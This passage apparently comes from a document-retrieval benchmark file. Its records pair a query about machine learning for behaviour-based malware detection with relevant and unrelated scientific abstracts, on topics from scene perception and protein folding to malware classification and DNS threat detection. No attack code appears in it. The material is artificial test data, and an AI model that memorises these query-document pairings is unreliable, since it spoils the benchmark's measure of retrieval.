"text": "We see the world in scenes, where visual objects occur in rich surroundings, often embedded in a typical context with other related objects. How does the human brain analyse and use these common associations? This article reviews the knowledge that is available, proposes specific mechanisms for the contextual facilitation of object recognition, and highlights important open questions. Although much has already been revealed about the cognitive and cortical mechanisms that subserve recognition of individual objects, surprisingly little is known about the neural underpinnings of contextual analysis and scene perception. Building on previous findings, we now have the means to address the question of how the brain integrates individual elements to construct the visual experience.",
"title": ""
},
{
"docid": "4bcfc77dabf9c0545fb28059a6df40c8",
"text": "Over the past decade, machine learning techniques have made substantial advances in many domains. In health care, global interest in the potential of machine learning has increased; for example, a deep learning algorithm has shown high accuracy in detecting diabetic retinopathy.1 There have been suggestions that machine learning will drive changes in health care within a few years, specifically in medical disciplines that require more accurate prognostic models (eg, oncology) and those based on pattern recognition (eg, radiology and pathology). However, comparative studies on the effectiveness of machine learning–based decision support systems (ML-DSS) in medicine are lacking, especially regarding the effects on health outcomes. Moreover, the introduction of new technologies in health care has not always been straightforward or without unintended and adverse effects.2 In this Viewpoint we consider the potential unintended consequences that may result from the application of ML-DSS in clinical practice.",
"title": ""
},
{
"docid": "9dbac84cc91712d6cefdc4f877614106",
"text": "In order to automatically identify a set of effective mammographic image features and build an optimal breast cancer risk stratification model, this study aims to investigate advantages of applying a machine learning approach embedded with a locally preserving projection (LPP) based feature combination and regeneration algorithm to predict short-term breast cancer risk. A dataset involving negative mammograms acquired from 500 women was assembled. This dataset was divided into two age-matched classes of 250 high risk cases in which cancer was detected in the next subsequent mammography screening and 250 low risk cases, which remained negative. First, a computer-aided image processing scheme was applied to segment fibro-glandular tissue depicted on mammograms and initially compute 44 features related to the bilateral asymmetry of mammographic tissue density distribution between left and right breasts. Next, a multi-feature fusion based machine learning classifier was built to predict the risk of cancer detection in the next mammography screening. A leave-one-case-out (LOCO) cross-validation method was applied to train and test the machine learning classifier embedded with a LLP algorithm, which generated a new operational vector with 4 features using a maximal variance approach in each LOCO process. Results showed a 9.7% increase in risk prediction accuracy when using this LPP-embedded machine learning approach. An increased trend of adjusted odds ratios was also detected in which odds ratios increased from 1.0 to 11.2. This study demonstrated that applying the LPP algorithm effectively reduced feature dimensionality, and yielded higher and potentially more robust performance in predicting short-term breast cancer risk.",
"title": ""
},
{
"docid": "4c995fce3bc3a0f9c8a06ebaec446ee7",
"text": "We introduce a facial animation system that produces real-time animation sequences including speech synchronization and non-verbal speech-related facial expressions from plain text input. A state-of-the-art text-to-speech synthesis component performs linguistic analysis of the text input and creates a speech signal from phonetic and intonation information. The phonetic transcription is additionally used to drive a speech synchronization method for the physically based facial animation. Further high-level information from the linguistic analysis such as different types of accents or pauses as well as the type of the sentence is used to generate non-verbal speech-related facial expressions such as movement of head, eyes, and eyebrows or voluntary eye blinks. Moreover, emoticons are translated into XML markup that triggers emotional facial expressions.",
"title": ""
},
{
"docid": "af737cc4e1b6d74d7acf5677dbe8f463",
"text": "(Forex) is a highly volatile complex time series for which predicting the daily trend is a challenging problem. In this paper, we investigate the prediction of the High exchange rate daily trend as a binary classification problem, with uptrend and downtrend outcomes. A large number of basic features driven from the time series data, including technical analysis features are generated using multiple history time windows. Various feature selection and feature extraction techniques are used to find best subsets for the classification problem. Machine learning systems are tested for each feature subset and results are analyzed. Four important Forex currency pairs are investigated and the results show consistent success in the daily prediction and in the expected profit.",
"title": ""
},
{
"docid": "14e2eecc36a1c08600598eb65678f99f",
"text": "The correct grasp of objects is a key aspect for the right fulfillment of a given task. Obtaining a good grasp requires algorithms to automatically determine proper contact points on the object as well as proper hand configurations, especially when dexterous manipulation is desired, and the quantification of a good grasp requires the definition of suitable grasp quality measures. This article reviews the quality measures proposed in the literature to evaluate grasp quality. The quality measures are classified into two groups according to the main aspect they evaluate: location of contact points on the object and hand configuration. The approaches that combine different measures from the two previous groups to obtain a global quality measure are also reviewed, as well as some measures related to human hand studies and grasp performance. Several examples are presented to illustrate and compare the performance of the reviewed measures.",
"title": ""
},
{
"docid": "3f268b6048d534720cac533f04c2aa7e",
"text": "This paper seeks a simple, cost effective and compact gate drive circuit for bi-directional switch of matrix converter. Principals of IGBT commutation and bi-directional switch commutation in matrix converters are reviewed. Three simple IGBT gate drive circuits are presented and simulated in PSpice and simulation results are approved by experiments in the end of this paper. Paper concludes with comparative numbers of gate drive costs.",
"title": ""
},
{
"docid": "44bd234a8999260420bb2a07934887af",
"text": "T e purpose of this review is to assess the nature and magnitudes of the dominant forces in protein folding. Since proteins are only marginally stable at room temperature,’ no type of molecular interaction is unimportant, and even small interactions can contribute significantly (positively or negatively) to stability (Alber, 1989a,b; Matthews, 1987a,b). However, the present review aims to identify only the largest forces that lead to the structural features of globular proteins: their extraordinary compactness, their core of nonpolar residues, and their considerable amounts of internal architecture. This review explores contributions to the free energy of folding arising from electrostatics (classical charge repulsions and ion pairing), hydrogen-bonding and van der Waals interactions, intrinsic propensities, and hydrophobic interactions. An earlier review by Kauzmann (1959) introduced the importance of hydrophobic interactions. His insights were particularly remarkable considering that he did not have the benefit of known protein structures, model studies, high-resolution calorimetry, mutational methods, or force-field or statistical mechanical results. The present review aims to provide a reassessment of the factors important for folding in light of current knowledge. Also considered here are the opposing forces, conformational entropy and electrostatics. The process of protein folding has been known for about 60 years. In 1902, Emil Fischer and Franz Hofmeister independently concluded that proteins were chains of covalently linked amino acids (Haschemeyer & Haschemeyer, 1973) but deeper understanding of protein structure and conformational change was hindered because of the difficulty in finding conditions for solubilization. Chick and Martin (191 1) were the first to discover the process of denaturation and to distinguish it from the process of aggregation. By 1925, the denaturation process was considered to be either hydrolysis of the peptide bond (Wu & Wu, 1925; Anson & Mirsky, 1925) or dehydration of the protein (Robertson, 1918). The view that protein denaturation was an unfolding process was",
"title": ""
},
{
"docid": "4a1b004dbade15e305b86d5eff9e814a",
"text": "We describe a heuristic method for drawing graphs which uses a multilevel framework combined with a force-directed placement algorithm. The multilevel technique matches and coalesces pairs of adjacent vertices to define a new graph and is repeated recursively to create a hierarchy of increasingly coarse graphs, G0, G1, . . . , GL. The coarsest graph, GL, is then given an initial layout and the layout is refined and extended to all the graphs starting with the coarsest and ending with the original. At each successive change of level, l, the initial layout for Gl is taken from its coarser and smaller child graph, Gl+1, and refined using force-directed placement. In this way the multilevel framework both accelerates and appears to give a more global quality to the drawing. The algorithm can compute both 2 & 3 dimensional layouts and we demonstrate it on examples ranging in size from 10 to 225,000 vertices. It is also very fast and can compute a 2D layout of a sparse graph in around 12 seconds for a 10,000 vertex graph to around 5-7 minutes for the largest graphs. This is an order of magnitude faster than recent implementations of force-directed placement algorithms.",
"title": ""
},
{
"docid": "211cf327b65cbd89cf635bbeb5fa9552",
"text": "BACKGROUND\nAdvanced mobile communications and portable computation are now combined in handheld devices called \"smartphones\", which are also capable of running third-party software. The number of smartphone users is growing rapidly, including among healthcare professionals. The purpose of this study was to classify smartphone-based healthcare technologies as discussed in academic literature according to their functionalities, and summarize articles in each category.\n\n\nMETHODS\nIn April 2011, MEDLINE was searched to identify articles that discussed the design, development, evaluation, or use of smartphone-based software for healthcare professionals, medical or nursing students, or patients. A total of 55 articles discussing 83 applications were selected for this study from 2,894 articles initially obtained from the MEDLINE searches.\n\n\nRESULTS\nA total of 83 applications were documented: 57 applications for healthcare professionals focusing on disease diagnosis (21), drug reference (6), medical calculators (8), literature search (6), clinical communication (3), Hospital Information System (HIS) client applications (4), medical training (2) and general healthcare applications (7); 11 applications for medical or nursing students focusing on medical education; and 15 applications for patients focusing on disease management with chronic illness (6), ENT-related (4), fall-related (3), and two other conditions (2). The disease diagnosis, drug reference, and medical calculator applications were reported as most useful by healthcare professionals and medical or nursing students.\n\n\nCONCLUSIONS\nMany medical applications for smartphones have been developed and widely used by health professionals and patients. The use of smartphones is getting more attention in healthcare day by day. Medical applications make smartphones useful tools in the practice of evidence-based medicine at the point of care, in addition to their use in mobile clinical communication. Also, smartphones can play a very important role in patient education, disease self-management, and remote monitoring of patients.",
"title": ""
},
{
"docid": "c3bd3031eeac1c223078094a8d7a2eb0",
"text": "Ambient-assisted living (AAL) is, nowadays, an important research and development area, foreseen as an important instrument to face the demographic aging. The acceptance of the AAL paradigm is closely related to the quality of the available systems, namely in terms of intelligent functions for the user interaction. In that context, usability and accessibility are crucial issues to consider. This paper presents a systematic literature review of AAL technologies, products and services with the objective of establishing the current position regarding user interaction and how are end users involved in the AAL development and evaluation processes. For this purpose, a systematic review of the literature on AAL was undertaken. A total of 1,048 articles were analyzed, 111 of which were mainly related to user interaction and 132 of which described practical AAL systems applied in a specified context and with a well-defined aim. Those articles classified as user interaction and systems were further characterized in terms of objectives, target users, users’ involvement, usability and accessibility issues, settings to be applied, technologies used and development stages. The results show the need to improve the integration and interoperability of the existing technologies and to promote user-centric developments with a strong involvement of end users, namely in what concerns usability and accessibility issues.",
"title": ""
},
{
"docid": "78c40bdaaa28daa997d4727d49976536",
"text": "Multiple-input multiple-output (MIMO) systems are well suited for millimeter-wave (mmWave) wireless communications where large antenna arrays can be integrated in small form factors due to tiny wavelengths, thereby providing high array gains while supporting spatial multiplexing, beamforming, or antenna diversity. It has been shown that mmWave channels exhibit sparsity due to the limited number of dominant propagation paths, thus compressed sensing techniques can be leveraged to conduct channel estimation at mmWave frequencies. This paper presents a novel approach of constructing beamforming dictionary matrices for sparse channel estimation using the continuous basis pursuit (CBP) concept, and proposes two novel low-complexity algorithms to exploit channel sparsity for adaptively estimating multipath channel parameters in mmWave channels. We verify the performance of the proposed CBP-based beamforming dictionary and the two algorithms using a simulator built upon a three-dimensional mmWave statistical spatial channel model, NYUSIM, that is based on real-world propagation measurements. Simulation results show that the CBP-based dictionary offers substantially higher estimation accuracy and greater spectral efficiency than the grid-based counterpart introduced by previous researchers, and the algorithms proposed here render better performance but require less computational effort compared with existing algorithms.",
"title": ""
},
{
"docid": "d8a13de3c5ca958b0afac1629930d6e7",
"text": "As the number and the diversity of news outlets on the Web grows, so does the opportunity for \"alternative\" sources of information to emerge. Using large social networks like Twitter and Facebook, misleading, false, or agenda-driven information can quickly and seamlessly spread online, deceiving people or influencing their opinions. Also, the increased engagement of tightly knit communities, such as Reddit and 4chan, further compounds the problem, as their users initiate and propagate alternative information, not only within their own communities, but also to different ones as well as various social media. In fact, these platforms have become an important piece of the modern information ecosystem, which, thus far, has not been studied as a whole.\n In this paper, we begin to fill this gap by studying mainstream and alternative news shared on Twitter, Reddit, and 4chan. By analyzing millions of posts around several axes, we measure how mainstream and alternative news flows between these platforms. Our results indicate that alt-right communities within 4chan and Reddit can have a surprising level of influence on Twitter, providing evidence that \"fringe\" communities often succeed in spreading alternative news to mainstream social networks and the greater Web.",
"title": ""
},
{
"docid": "b2de917d74765e39562c60c74a88d7f3",
"text": "Computer-phobic university students are easy to find today especially when it come to taking online courses. Affect has been shown to influence users’ perceptions of computers. Although self-reported computer anxiety has declined in the past decade, it continues to be a significant issue in higher education and online courses. More importantly, anxiety seems to be a critical variable in relation to student perceptions of online courses. A substantial amount of work has been done on computer anxiety and affect. In fact, the technology acceptance model (TAM) has been extensively used for such studies where affect and anxiety were considered as antecedents to perceived ease of use. However, few, if any, have investigated the interplay between the two constructs as they influence perceived ease of use and perceived usefulness towards using online systems for learning. In this study, the effects of affect and anxiety (together and alone) on perceptions of an online learning system are investigated. Results demonstrate the interplay that exists between affect and anxiety and their moderating roles on perceived ease of use and perceived usefulness. Interestingly, the results seem to suggest that affect and anxiety may exist simultaneously as two weights on each side of the TAM scale.",
"title": ""
},
{
"docid": "a5d568b4a86dcbda2c09894c778527ea",
"text": "INTRODUCTION\nHypoglycemia (Hypo) is the most common side effect of insulin therapy in people with type 1 diabetes (T1D). Over time, patients with T1D become unaware of signs and symptoms of Hypo. Hypo unawareness leads to morbidity and mortality. Diabetes alert dogs (DADs) represent a unique way to help patients with Hypo unawareness. Our group has previously presented data in abstract form which demonstrates the sensitivity and specificity of DADS. The purpose of our current study is to expand evaluation of DAD sensitivity and specificity using a method that reduces the possibility of trainer bias.\n\n\nMETHODS\nWe evaluated 6 dogs aging 1-10 years old who had received an average of 6 months of training for Hypo alert using positive training methods. Perspiration samples were collected from patients during Hypo (BG 46-65 mg/dL) and normoglycemia (BG 85-136 mg/dl) and were used in training. These samples were placed in glass vials which were then placed into 7 steel cans (1 Hypo, 2 normal, 4 blank) randomly placed by roll of a dice. The dogs alerted by either sitting in front of, or pushing, the can containing the Hypo sample. Dogs were rewarded for appropriate recognition of the Hypo samples using a food treat via a remote control dispenser. The results were videotaped and statistically evaluated for sensitivity (proportion of lows correctly alerted, \"true positive rate\") and specificity (proportion of blanks + normal samples not alerted, \"true negative rate\") calculated after pooling data across all trials for all dogs.\n\n\nRESULTS\nAll DADs displayed statistically significant (p value <0.05) greater sensitivity (min 50.0%-max 87.5%) to detect the Hypo sample than the expected random correct alert of 14%. Specificity ranged from a min of 89.6% to a max of 97.9% (expected rate is not defined in this scenario).\n\n\nCONCLUSIONS\nOur results suggest that properly trained DADs can successfully recognize and alert to Hypo in an in vitro setting using smell alone.",
"title": ""
},
{
"docid": "d01339e077c9d8300b4616e7c713f48e",
"text": "Blockchains as a technology emerged to facilitate money exchange transactions and eliminate the need for a trusted third party to notarize and verify such transactions as well as protect data security and privacy. New structures of Blockchains have been designed to accommodate the need for this technology in other fields such as e-health, tourism and energy. This paper is concerned with the use of Blockchains in managing and sharing electronic health and medical records to allow patients, hospitals, clinics, and other medical stakeholder to share data amongst themselves, and increase interoperability. The selection of the Blockchains used architecture depends on the entities participating in the constructed chain network. Although the use of Blockchains may reduce redundancy and provide caregivers with consistent records about their patients, it still comes with few challenges which could infringe patients' privacy, or potentially compromise the whole network of stakeholders. In this paper, we investigate different Blockchains structures, look at existing challenges and provide possible solutions. We focus on challenges that may expose patients' privacy and the resiliency of Blockchains to possible attacks.",
"title": ""
},
{
"docid": "7c0328e05e30a11729bc80255e09a5b8",
"text": "This paper presents a preliminary design for a moving-target defense (MTD) for computer networks to combat an attacker's asymmetric advantage. The MTD system reasons over a set of abstract models that capture the network's configuration and its operational and security goals to select adaptations that maintain the operational integrity of the network. The paper examines both a simple (purely random) MTD system as well as an intelligent MTD system that uses attack indicators to augment adaptation selection. A set of simulation-based experiments show that such an MTD system may in fact be able to reduce an attacker's success likelihood. These results are a preliminary step towards understanding and quantifying the impact of MTDs on computer networks.",
"title": ""
},
{
"docid": "a52d2a2c8fdff0bef64edc1a97b89c63",
"text": "This paper provides a review of recent developments in speech recognition research. The concept of sources of knowledge is introduced and the use of knowledge to generate and verify hypotheses is discussed. The difficulties that arise in the construction of different types of speech recognition systems are discussed and the structure and performance of several such systems is presented. Aspects of component subsystems at the acoustic, phonetic, syntactic, and semantic levels are presented. System organizations that are required for effective interaction and use of various component subsystems in the presence of error and ambiguity are discussed.",
"title": ""
},
{
"docid": "1b8394f45b88f2474f72c500fc0a6fe4",
"text": "User-Generated live video streaming systems are services that allow anybody to broadcast a video stream over the Internet. These Over-The-Top services have recently gained popularity, in particular with e-sport, and can now be seen as competitors of the traditional cable TV. In this paper, we present a dataset for further works on these systems. This dataset contains data on the two main user-generated live streaming systems: Twitch and the live service of YouTube. We got three months of traces of these services from January to April 2014. Our dataset includes, at every five minutes, the identifier of the online broadcaster, the number of people watching the stream, and various other media information. In this paper, we introduce the dataset and we make a preliminary study to show the size of the dataset and its potentials. We first show that both systems generate a significant traffic with frequent peaks at more than 1 Tbps. Thanks to more than a million unique uploaders, Twitch is in particular able to offer a rich service at anytime. Our second main observation is that the popularity of these channels is more heterogeneous than what have been observed in other services gathering user-generated content.",
"title": ""
}
] | scidocsrr |
f6871f73d7e42aae2bfaa28375dcac05 | Analysis of Machine learning Techniques Used in Behavior-Based Malware Detection | [
{
"docid": "c3525081c0f4eec01069dd4bd5ef12ab",
"text": "More than twelve years have elapsed since the first public release of WEKA. In that time, the software has been rewritten entirely from scratch, evolved substantially and now accompanies a text on data mining [35]. These days, WEKA enjoys widespread acceptance in both academia and business, has an active community, and has been downloaded more than 1.4 million times since being placed on Source-Forge in April 2000. This paper provides an introduction to the WEKA workbench, reviews the history of the project, and, in light of the recent 3.6 stable release, briefly discusses what has been added since the last stable version (Weka 3.4) released in 2003.",
"title": ""
},
{
"docid": "f395e3d72341bd20e1a16b97259bad7d",
"text": "Malicious software in form of Internet worms, computer viru ses, and Trojan horses poses a major threat to the security of network ed systems. The diversity and amount of its variants severely undermine the effectiveness of classical signature-based detection. Yet variants of malware f milies share typical behavioral patternsreflecting its origin and purpose. We aim to exploit these shared patterns for classification of malware and propose a m thod for learning and discrimination of malware behavior. Our method proceed s in three stages: (a) behavior of collected malware is monitored in a sandbox envi ro ment, (b) based on a corpus of malware labeled by an anti-virus scanner a malware behavior classifieris trained using learning techniques and (c) discriminativ e features of the behavior models are ranked for explanation of classifica tion decisions. Experiments with di fferent heterogeneous test data collected over several month s using honeypots demonstrate the e ffectiveness of our method, especially in detecting novel instances of malware families previously not recognized by commercial anti-virus software.",
"title": ""
},
{
"docid": "11a000ec43847bae955160cf7ea3106d",
"text": "Malicious activities on the Internet are one of the most dangerous threats to Internet users and organizations. Malicious software controlled remotely is addressed as one of the most critical methods for executing the malicious activities. Since blocking domain names for command and control (C&C) of the malwares by analyzing their Domain Name System (DNS) activities has been the most effective and practical countermeasure, attackers attempt to hide their malwares by adopting several evasion techniques, such as client sub-grouping and domain flux on DNS activities. A common feature of the recently developed evasion techniques is the utilization of multiple domain names for render malware DNS activities temporally and spatially more complex. In contrast to analyzing the DNS activities for a single domain name, detecting the malicious DNS activities for multiple domain names is not a simple task. The DNS activities of malware that uses multiple domain names, termed multi-domain malware, are sparser and less synchronized with respect to space and time. In this paper, we introduce a malware activity detection mechanism, GMAD: Graph-based Malware Activity Detection that utilizes a sequence of DNS queries in order to achieve robustness against evasion techniques. GMAD uses a graph termed Domain Name Travel Graph which expresses DNS query sequences to detect infected clients and malicious domain names. In addition to detecting malware C&C domain names, GMAD detects malicious DNS activities such as blacklist checking and fake DNS querying. To detect malicious domain names utilized to malware activities, GMAD applies domain name clustering using the graph structure and determines malicious clusters by referring to public blacklists. Through experiments with four sets of DNS traffic captured in two ISP networks in the U.S. and South Korea, we show that GMAD detected thousands of malicious domain names that had neither been blacklisted nor detected through group activity of DNS clients. In a detection accuracy evaluation, GMAD showed an accuracy rate higher than 99% on average, with a higher than 90% precision and lower than 0:5% false positive rate. It is shown that the proposed method is effective for detecting multi-domain malware activities irrespective of evasion techniques. 2014 Elsevier B.V. All rights reserved.",
"title": ""
}
] | [
{
"docid": "c61db9b20e213146f82ffc22b5319be8",
"text": "The hypoxia-inducible factor α-subunits (HIFα) are key transcription factors in the mammalian response to oxygen deficiency. The HIFα regulation in response to hypoxia occurs primarily on the level of protein stability due to posttranslational hydroxylation and proteasomal degradation. However, HIF α-subunits also respond to various growth factors, hormones, or cytokines under normoxia indicating involvement of different kinase pathways in their regulation. Because these proteins participate in angiogenesis, glycolysis, programmed cell death, cancer, and ischemia, HIFα regulating kinases are attractive therapeutic targets. Although numerous kinases were reported to regulate HIFα indirectly, direct phosphorylation of HIFα affects HIFα stability, nuclear localization, and transactivity. Herein, we review the role of phosphorylation-dependent HIFα regulation with emphasis on protein stability, subcellular localization, and transactivation.",
"title": ""
},
{
"docid": "d5868da2fedb7498a9d6454ed939408c",
"text": "over concrete thinking Understand that virtual objects are computer generated, and they do not need to obey physical laws",
"title": ""
},
{
"docid": "8c467cec76d31fee70e8206769b121c3",
"text": "Color preference is an important aspect of visual experience, but little is known about why people in general like some colors more than others. Previous research suggested explanations based on biological adaptations [Hurlbert AC, Ling YL (2007) Curr Biol 17:623-625] and color-emotions [Ou L-C, Luo MR, Woodcock A, Wright A (2004) Color Res Appl 29:381-389]. In this article we articulate an ecological valence theory in which color preferences arise from people's average affective responses to color-associated objects. An empirical test provides strong support for this theory: People like colors strongly associated with objects they like (e.g., blues with clear skies and clean water) and dislike colors strongly associated with objects they dislike (e.g., browns with feces and rotten food). Relative to alternative theories, the ecological valence theory both fits the data better (even with fewer free parameters) and provides a more plausible, comprehensive causal explanation of color preferences.",
"title": ""
},
{
"docid": "b3bc34cfbe6729f7ce540a792c32bf4c",
"text": "The employment of MIMO OFDM technique constitutes a cost effective approach to high throughput wireless communications. The system performance is sensitive to frequency offset which increases with the doppler spread and causes Intercarrier interference (ICI). ICI is a major concern in the design as it can potentially cause a severe deterioration of quality of service (QoS) which necessitates the need for a high speed data detection and decoding with ICI cancellation along with the intersymbol interference (ISI) cancellation in MIMO OFDM communication systems. Iterative parallel interference canceller (PIC) with joint detection and decoding is a promising approach which is used in this work. The receiver consists of a two stage interference canceller. The co channel interference cancellation is performed based on Zero Forcing (ZF) Detection method used to suppress the effect of ISI in the first stage. The latter stage consists of a simplified PIC scheme. High bit error rates of wireless communication system require employing forward error correction (FEC) methods on the data transferred in order to avoid burst errors that occur in physical channel. To achieve high capacity with minimum error rate Low Density Parity Check (LDPC) codes which have recently drawn much attention because of their error correction performance is used in this system. The system performance is analyzed for two different values of normalized doppler shift for varying speeds. The bit error rate (BER) is shown to improve in every iteration due to the ICI cancellation. The interference analysis with the use of ICI cancellation is examined for a range of normalized doppler shift which corresponds to mobile speeds varying from 5Km/hr to 250Km/hr.",
"title": ""
},
{
"docid": "86f5c3e7b238656ae5f680db6ce0b7f5",
"text": "It is important to study and analyse educational data especially students’ performance. Educational Data Mining (EDM) is the field of study concerned with mining educational data to find out interesting patterns and knowledge in educational organizations. This study is equally concerned with this subject, specifically, the students’ performance. This study explores multiple factors theoretically assumed to affect students’ performance in higher education, and finds a qualitative model which best classifies and predicts the students’ performance based on related personal and social factors. Keywords—Data Mining; Education; Students; Performance; Patterns",
"title": ""
},
{
"docid": "175f0a7892bde96185e5fea3afc30a54",
"text": "We study the problem of searching on data that is encrypted using a public key system. Consider user Bob who sends email to user Alice encrypted under Alice’s public key. An email gateway wants to test whether the email contains the keyword “urgent” so that it could route the email accordingly. Alice, on the other hand does not wish to give the gateway the ability to decrypt all her messages. We define and construct a mechanism that enables Alice to provide a key to the gateway that enables the gateway to test whether the word “urgent” is a keyword in the email without learning anything else about the email. We refer to this mechanism as Public Key Encryption with keyword Search. As another example, consider a mail server that stores various messages publicly encrypted for Alice by others. Using our mechanism Alice can send the mail server a key that will enable the server to identify all messages containing some specific keyword, but learn nothing else. We define the concept of public key encryption with keyword search and give several constructions.",
"title": ""
},
{
"docid": "3394eb51b71e5def4e4637963da347ab",
"text": "In this paper we present a model of e-learning suitable for teacher training sessions. The main purpose of our work is to define the components of the educational system which influences the successful adoption of e-learning in the field of education. We also present the factors of the readiness of e-learning mentioned in the literature available and classifies them into the 3 major categories that constitute the components of every organization and consequently that of education. Finally, we present an implementation model of e-learning through the use of virtual private networks, which lends an added value to the realization of e-learning.",
"title": ""
},
{
"docid": "4e7003b497dc59c373347d8814c8f83e",
"text": "The present experiment was designed to test whether specific recordable changes in the neuromuscular system could be associated with specific alterations in soft- and hard-tissue morphology in the craniofacial region. The effect of experimentally induced neuromuscular changes on the craniofacial skeleton and dentition of eight rhesus monkeys was studied. The neuromuscular changes were triggered by complete nasal airway obstruction and the need for an oral airway. Alterations were also triggered 2 years later by removal of the obstruction and the return to nasal breathing. Changes in neuromuscular recruitment patterns resulted in changed function and posture of the mandible, tongue, and upper lip. There was considerable variation among the animals. Statistically significant morphologic effects of the induced changes were documented in several of the measured variables after the 2-year experimental period. The anterior face height increased more in the experimental animals than in the control animals; the occlusal and mandibular plane angles measured to the sella-nasion line increased; and anterior crossbites and malposition of teeth occurred. During the postexperimental period some of these changes were reversed. Alterations in soft-tissue morphology were also observed during both experimental periods. There was considerable variation in morphologic response among the animals. It was concluded that the marked individual variations in skeletal morphology and dentition resulting from the procedures were due to the variation in nature and degree of neuromuscular and soft-tissue adaptations in response to the altered function. The recorded neuromuscular recruitment patterns could not be directly related to specific changes in morphology.",
"title": ""
},
{
"docid": "cf79cd1f110e2539697390e37e48b8d8",
"text": "This paper investigates an application of mobile sensing: detecting and reporting the surface conditions of roads. We describe a system and associated algorithms to monitor this important civil infrastructure using a collection of sensor-equipped vehicles. This system, which we call the Pothole Patrol (P2), uses the inherent mobility of the participating vehicles, opportunistically gathering data from vibration and GPS sensors, and processing the data to assess road surface conditions. We have deployed P2 on 7 taxis running in the Boston area. Using a simple machine-learning approach, we show that we are able to identify potholes and other severe road surface anomalies from accelerometer data. Via careful selection of training data and signal features, we have been able to build a detector that misidentifies good road segments as having potholes less than 0.2% of the time. We evaluate our system on data from thousands of kilometers of taxi drives, and show that it can successfully detect a number of real potholes in and around the Boston area. After clustering to further reduce spurious detections, manual inspection of reported potholes shows that over 90% contain road anomalies in need of repair.",
"title": ""
},
{
"docid": "6098f38f1e41d25107b512a8e6f2e397",
"text": "This paper presents an analysis and comparison of three existing ontology visualization tools with a new ontology visualization tool developed at the Energy Informatics Laboratory of University of Regina, Canada. The new tool is called Onto3DViz, which is designed as a knowledge engineering support tool for ontology visualization. It aims to address the deficiency that existing tools have in their lack of support for dynamic knowledge visualization. The Onto3DViz is a tool that supports a new approach of visualization in that it supports: (1) dynamic knowledge visualization; and (2) complex ontology visualization in 3-dimensional (3D) computer graphics. This paper also discusses the strengths and weaknesses of the four visualization tool when they are measured against a set of assessment criteria.",
"title": ""
},
{
"docid": "fdd33f6248bef5837ea322305d9a0549",
"text": "Visual Grounding (VG) aims to locate the most relevant object or region in an image, based on a natural language query. The query can be a phrase, a sentence or even a multi-round dialogue. There are three main challenges in VG: 1) what is the main focus in a query; 2) how to understand an image; 3) how to locate an object. Most existing methods combine all the information curtly, which may suffer from the problem of information redundancy (i.e. ambiguous query, complicated image and a large number of objects). In this paper, we formulate these challenges as three attention problems and propose an accumulated attention (A-ATT) mechanism to reason among them jointly. Our A-ATT mechanism can circularly accumulate the attention for useful information in image, query, and objects, while the noises are ignored gradually. We evaluate the performance of A-ATT on four popular datasets (namely Refer-COCO, ReferCOCO+, ReferCOCOg, and Guesswhat?!), and the experimental results show the superiority of the proposed method in term of accuracy.",
"title": ""
},
{
"docid": "2096fff6f862603ea86f51185697066f",
"text": "OBJECTIVE\nThis report provides an overview of marital and cohabiting relationships in the United States among men and women aged 15-44 in 2002, by a variety of characteristics. National estimates are provided that highlight formal and informal marital status, previous experience with marriage and cohabitation, the sequencing of marriage and cohabitation, and the stability of cohabitations and marriages.\n\n\nMETHODS\nThe analyses presented in this report are based on a nationally representative sample of 12,571 men and women aged 15-44 living in households in the United States in 2002, based on the National Survey of Family Growth, Cycle 6.\n\n\nRESULTS\nOver 40% of men and women aged 15-44 were currently married at the date of interview, compared with about 9% who were currently cohabiting. Men and women were, however, likely to cohabit prior to becoming married. Marriages were longer lasting than cohabiting unions; about 78% of marriages lasted 5 years or more, compared with less than 30% of cohabitations. Cohabitations were shorter-lived than marriages in part because about half of cohabitations transitioned to marriage within 3 years. Variations--often large variations-in marital and cohabiting relationships and durations were found by race and Hispanic origin, education, family background, and other factors.",
"title": ""
},
{
"docid": "617aca6820f774473944b9bfe822cc81",
"text": "Dental implant surgery has become routine treatment in dentistry and is generally considered to be a safe surgical procedure with a high success rate. However, complications should be taken into consideration because they can follow dental implant surgery as with any other surgical procedure. Many of the complications can be resolved without severe problems; however, in some cases, they can cause dental implant failure or even lifethreatening circumstances. Avoiding complications begins with careful treatment planning based on accurate preoperative anatomic evaluations and an understanding of all potential problems. This chapter contains surgical complications associated with dental implant surgery and management.",
"title": ""
},
{
"docid": "8405f30ca5f4bd671b056e9ca1f4d8df",
"text": "The remarkable manipulative skill of the human hand is not the result of rapid sensorimotor processes, nor of fast or powerful effector mechanisms. Rather, the secret lies in the way manual tasks are organized and controlled by the nervous system. At the heart of this organization is prediction. Successful manipulation requires the ability both to predict the motor commands required to grasp, lift, and move objects and to predict the sensory events that arise as a consequence of these commands.",
"title": ""
},
{
"docid": "cd3385566bc8ae12046122d5a32a3fb5",
"text": "Systematic reviews of literature relevant to adults with Alzheimer's disease and their families are important to the practice of occupational therapy. We describe the seven questions that served as the focus for systematic reviews of the effectiveness of occupational therapy interventions for adults with Alzheimer's disease and their families. We include the background for the reviews; the process followed for each question, including search terms and search strategy; the databases searched; and the methods used to summarize and critically appraise the literature. The final number of articles included in each systematic review; a summary of the results; the strengths and limitations of the findings; and implications for practice, education, and research are presented for the six questions addressing interventions in the areas of occupation, perception, environment, activity demands, fall prevention, and caregiver strategies.",
"title": ""
},
{
"docid": "4d8c869c9d6e1d7ba38f56a124b84412",
"text": "We propose a novel reversible jump Markov chain Monte Carlo (MCMC) simulated an nealing algorithm to optimize radial basis function (RBF) networks. This algorithm enables us to maximize the joint posterior distribution of the network parameters and the number of basis functions. It performs a global search in the joint space of the pa rameters and number of parameters, thereby surmounting the problem of local minima. We also show that by calibrating a Bayesian model, we can obtain the classical AIC, BIC and MDL model selection criteria within a penalized likelihood framework. Finally, we show theoretically and empirically that the algorithm converges to the modes of the full posterior distribution in an efficient way.",
"title": ""
},
{
"docid": "aab0902392cd011893bc7d2ad76e9220",
"text": "We discuss several uses of blockchain (and, more generally, distributed ledger) technologies outside of cryptocurrencies with a pragmatic view. We mostly focus on three areas: the role of coin economies for what we refer to as data malls (specialized data marketplaces); data provenance (a historical record of data and its origins); and what we term keyless payments (made without having to know other users’ cryptographic keys). We also discuss voting and other areas, and give a sizable list of academic and nonacademic references.",
"title": ""
},
{
"docid": "c7e75d6abd8065d20da39b264a510c83",
